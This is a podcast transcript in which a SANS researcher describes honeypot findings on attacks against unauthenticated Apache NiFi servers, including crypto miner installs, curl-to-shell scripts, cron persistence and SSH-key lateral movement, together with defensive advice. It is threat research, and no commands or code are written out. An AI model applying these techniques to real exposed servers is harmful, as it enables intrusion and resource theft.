CyberWire Daily - Managing machine learning risks. [Research Saturday]
Episode Date: June 17, 2023Our guest, Johannes Ullrich from SANS Institute, joins Dave to discuss their research on "Machine Learning Risks: Attacks Against Apache NiFi." Using their honeypot network, researchers were able to ...collect some interesting data about a threat actor who is currently going after exposed Apache NiFi servers. Researchers state “On May 19th, our distributed sensor network detected a notable spike in requests for ‘/nifi.’” Investigating further, they instructed a subset of their sensors to forward requests to an actual Apache NiFi instance and within a couple of hours the honeypot was completely compromised. The research can be found here: Machine Learning Risks: Attacks Against Apache NiFi Learn more about your ad choices. Visit megaphone.fm/adchoices
Transcript
Discussion (0)
You're listening to the Cyber Wire Network, powered by N2K. of you, I was concerned about my data being sold by data brokers. So I decided to try Delete.me.
I have to say, Delete.me is a game changer. Within days of signing up, they started removing my
personal information from hundreds of data brokers. I finally have peace of mind knowing
my data privacy is protected. Delete.me's team does all the work for you with detailed reports
so you know exactly what's been done. Take control of your data and keep your private life Thank you. Hello, everyone, and welcome to the CyberWires Research Saturday.
I'm Dave Bittner, and this is our weekly conversation with researchers and analysts
tracking down the threats and vulnerabilities,
solving some of the hard problems,
and protecting ourselves in our rapidly evolving cyberspace.
Thanks for joining us.
What we saw is in our honeypot network,
we sort of get alerts whenever there's a new kind of URL
that is being probed in honeypots.
And one of the URLs that sort of caused the spike here
was slash NiFi,
which, of course, initially didn't really ring a bell.
But then doing some looking into it,
we figured out that this is likely going after Apache NiFi,
which is often described as a data orchestration platform.
That's Johannes Ulrich.
He's the Dean of Research at the SANS Technology Institute.
The research we're discussing today is titled
Machine Learning Risks, Attacks Against Apache NiFi.
Yeah, I have to admit, NiFi was a new one to me.
It had me running to search for exactly what it was.
Can you describe to us what is the general use case for Apache NiFi?
Yeah, so a little bit history here.
It actually was developed by the NSA, who open sourced it about 10 years ago.
And the Apache project sort of took over maintenance of it.
It's described as a data orchestration platform.
What it does is it reads data from a large number of sources,
whether that's like cloud storage, database and such.
You can filter it, you can extract subsets of that data,
and it'll save it back or send it back to some destination.
And again, you have a wide range here.
So use cases are, for example, in business data.
You receive data from a database that you then need to adapt
in order to use it, for example, in some kind of analytic system.
It's also often used these days in machine learning
because you have these large data sets that you need to adapt
in order to then process them in your machine learning algorithm.
So these are some of the use cases here.
It's written in Java, and one of the nice things about it is
you don't really need to do a lot of coding with it.
It sort of presents a GUI web interface.
You can sort of drop and track your sources.
You can configure credentials for your S3 bug and tell it,
hey, read that JSON file,
pull it out there, turn on an XML file that maybe my enterprise resource planning system can read.
Well, let's walk through this together.
I mean, as you say, you were noticing some things
on your honeypot, so where did it go from there?
Well, then of course we want to figure out
what is it actually attempting to do here?
They're definitely looking for NiFi, but why?
That's, of course, the next question.
There is, of course, some interesting data often in these NiFi systems.
So what we did is we set up an actual NiFi instance.
The problem, of course, with this often described as a full interaction honeypot is you can't really set up a lot of them. We set up one
of them, but our honeypot
network, we have sort of the feature
where we can redirect queries
from the honeypots to
a system like this. So
a subset of the honeypots
were now sending, whenever they saw something
going to port 8080 or
8443, which are default
ports for Apache and NiFi.
Whenever they saw something, well, they were just
proxying it to our real NiFi instance
that we weren't able to monitor.
And now, of course, the attacker, well,
they couldn't tell that this was a honeypot anymore.
They considered that a real NiFi instance,
which actually, well, it was.
It was a real full-featured NiFi instance.
So you see them coming in and searching for this,
and when they hit the NiFi instance, what do they do?
Well, there are sort of two things we saw.
One thing was they installed a crypto coin miner, of course.
It was a little bit of a letdown initially, I have to admit,
because that's what everybody does.
And they used a feature, it's not a vulnerability.
So I want to point out here that at no time
they actually abused a vulnerability
or some kind of zero day or such here.
We had a completely patched and up-to-date version
of NiFi,
but NiFi has a feature built in that allows you to execute code.
And that's the sort of processor that you can set up to process your data,
where you can basically load scripts that will process your data.
And with that, you have the ability to run arbitrary code. The real problem here is that the attacker took advantage of not requiring
a password to actually access
NiFi. It's highly recommended
in documentation, but who
reads the manual?
Is this primarily a
configuration issue where folks
who are making use of this are
neglecting to properly secure it or
exposing it to the internet to begin with?
I think both.
So you never really should expose something like this to the internet.
It's a very complex system.
It had vulnerabilities in the past, nothing really super critical.
So they have done a reasonable good job there.
But the number one problem is that configuration issue
that you didn't configure a password.
It's not hard. Like I said, there is documentation for it. They have issue that you didn't configure a password. It's not hard.
Like I said, there is documentation for it.
They have a simple command to set up a password.
So it's not really all that difficult.
It becomes a real problem if you actually process real data with NiFi.
Because now you not only have access to the data,
but also credentials.
Because in order for NiFi to access the data,
well, NiFi needs to know
how to connect to a database, how to connect to that S3 bucket. That information an attacker could
also retrieve from NiFi if there's no password or a weak password. The other thing we then saw
is that in addition to installing CryptoCoin, as I said, was sort of a little bit of letdown.
The most they did, but there were a of attackers also that used NiFi to then probe the network.
So once they had control of the NiFi server,
they didn't know what's offered for this lateral movement
where they searched the NiFi server for credentials,
in particular SSH keys.
They looked at, hey, did anybody log in this NiFi server
and then connect anywhere else via SSH?
So they went all through the account and host combinations there and basically tried to abuse any of them to gain additional access to systems.
And now, a message from our sponsor, Zscaler, the leader in cloud security.
Enterprises have spent billions of dollars on firewalls and VPNs,
yet breaches continue to rise by an 18% year-over-year increase in ransomware attacks and a $75 million record payout in 2024.
increase in ransomware attacks and a $75 million record payout in 2024, these traditional security tools expand your attack surface with public-facing IPs that are exploited by bad actors
more easily than ever with AI tools. It's time to rethink your security. Zscaler Zero Trust plus AI
stops attackers by hiding your attack surface, making apps and IPs invisible,
eliminating lateral movement,
connecting users only to specific
apps, not the entire network,
continuously verifying
every request based on identity
and context, simplifying
security management with AI-powered
automation, and detecting
threats using AI to analyze
over 500 billion daily transactions.
Hackers can't attack what they can't see. Protect your organization with Zscaler Zero Trust and AI.
Learn more at zscaler.com security.
Now, for the folks who are running this NiFi instance,
say someone comes in and drops a crypto miner in, is it obvious that that has happened?
Or does it run quietly behind the scenes?
Well, it depends on how careful you look.
Within the GUI, you will see these processors that the attacker has set up.
So that's something that you should notice.
Of course, you have a very complex instance.
There may be tons of processes that you already have configured.
It may not be that obvious that you actually have a new one here that wasn't authorized.
In the case that we observed, the attacker also set up a ground job in order to
have sort of a backup in case that process gets deleted or NiFi gets removed from that system.
That ground job would run once a minute and try to reinstall things again. Overall, this was fairly
noisy, so an administrator should be able to notice that if they're watching.
Let's face it, they didn't start by setting up a password for it, so who knows what else
is missing there.
And of course, odd network connections then outbound from that system and such, which
may or may not be notable depending on how noisy your network is in general.
Yeah.
Now, in your research, correct me if I'm wrong here,
this is all running in RAM, so it's trying to hide itself that way?
Yeah, so the install script that's being downloaded is never saved to disk.
It's a simple bash script.
It just uses curl, the command line command, to retrieve commands
or retrieve files via HTTP,
pass it directly to SH, to the shell.
So that's never being saved.
The crypto coin miner they're downloading is being saved.
Some of the other things like the SH scanning of other machines,
also no real files being saved here.
That's the same thing.
It just downloads it via curl and pipes it directly to shell.
While you may find some miscellaneous
evidence of this, there is no
actual file being saved on the system.
Yeah.
Is it fair to say from your description here
that we're looking at opportunists
basically? This isn't a high level of
sophistication?
Correct. This looks like opportunists. CryptocurrencyMiner, of course, could also be sort of their
last resort, kind of, if they don't find anything else interesting to do with this instance.
And our instance didn't really have any interesting data that they say, you know,
let's make some crypto coins while we're in here and sort of use data this way.
The interesting part was there was really just
one attacker who was really
heavily scanning for this.
Also, we then sort of went through some search
and to see, well, you know, who's actually exposing
NiFi? And
found a lot of sort of cloud
instances, like particularly in Azure
and such, where people had
NiFi set up. And that's, of course, where
the entire issue
with blocking Internet access becomes more tricky
because, well, now your NiFi instance is in the cloud,
you have to connect to it via the open Internet
unless you set up some careful IP address filtering,
which you easily get wrong and then you lose access to it.
So that may be one reason why there are these
exposed NiFi instances.
Yeah, that's interesting. Any idea who is behind this? You said it seems to be coming from one place primarily.
Yeah, we saw a lot of Russian IPs that's part of the infrastructure
where all of the hosts are located, where all the scripts are being loaded from. Some Ukrainian hosts,
one in particular, does a lot of scanning.
Whereas these days, sometimes geolocation with Ukraine versus Russia can be a little bit tricky here.
I haven't really looked that close into it.
But I haven't really found any strong evidence
as far as nationality or so goes.
It's using commodity malware like this crypto coin miner
is fairly commonly found.
So I'm not really sure if that's one act or another.
It could be anybody.
Any notion of how widespread this is?
Well, like I said, we really see one attacker
who is trying it really hard.
As far as open NiFi instances,
a quick scan of the standard search engine
shows a couple of hundred maybe that are out there
that are open to the public on default ports.
Hadn't really looked too closely
how many are maybe hiding a little bit
on slightly different URLs.
But this attacker really seems to go
for these default instances.
This could also be something where an attacker,
once they gain access to a network,
is looking for these NiFi instances.
Because after all, they do allow that operating code execution.
So that would be also then an initial lateral movement again for an attacker
who breached a network with a NiFi instance.
Right, right. I'm here. While I'm here, I might as well drop a cryptocurrency miner.
Or just look for any data being touched by NiFi.
That's something we'll probably do in the future,
put some credentials in there and see if they're then being used.
Right. So what are the recommendations then
for folks who are using Apache NiFi?
What sort of things should they be looking out for here?
I think the number one thing is right now just inventory.
That's sort of one problem here.
You may find
data scientists,
people in
business analytics and such
that set up NiFi instances
in the cloud without necessarily
that rogue IT kind of
issue where they don't
necessarily properly account for it
and so it never really gets properly configured and patched and all of that good stuff.
But the number one thing is if you have NiFi, put a password in there.
Even a weak password is better than no password.
But while you're at it, pick something a little bit better than NiFi kind of as a password.
Right, NiFi 1, yeah.
Right, while you're putting in a password,
oh, what the heck, make it a strong one.
Yes.
I don't think there is much sort of
in terms of a strong authentication,
but I haven't really looked into
how it sort of would integrate
with any kind of SSO or such.
Right, right.
It's really an interesting case here
because, I mean, obviously a legitimate tool,
not terribly widespread usage, it would seem.
And yet, some clever hacker out there has found a way to use it to their advantage.
I suppose it's kind of a cautionary tale.
Yeah, and that's really just if it's out there, if it's vulnerable, they'll find it.
They may find it before you find it, and that's really the big problem.
Our thanks to Johannes Ulrich from the SANS Technology Institute for joining us.
The research is titled
Machine Learning Risks,
Attacks Against Apache NiFi.
We'll have a link in the show notes.
Cyber threats are evolving every second, and staying ahead is more than just a challenge.
It's a necessity. That's why we're thrilled to partner with ThreatLocker, a cybersecurity solution trusted by businesses worldwide.
ThreatLocker is a full suite of solutions designed to give you total control,
stopping unauthorized applications, securing sensitive data,
and ensuring your organization runs smoothly and securely.
Visit ThreatLocker.com today to see how a default-deny approach
can keep your company safe and compliant.
The CyberWire Research Saturday podcast is a production of N2K Networks,
proudly produced in Maryland out of the startup studios of DataTribe,
where they're co-building the next generation of cybersecurity teams and technologies.
This episode was produced by Liz Ervin and senior producer Jennifer Iben.
Our mixer is Elliot Peltzman.
Our executive editor is Peter Kilpie.
And I'm Dave Bittner.
Thanks for listening.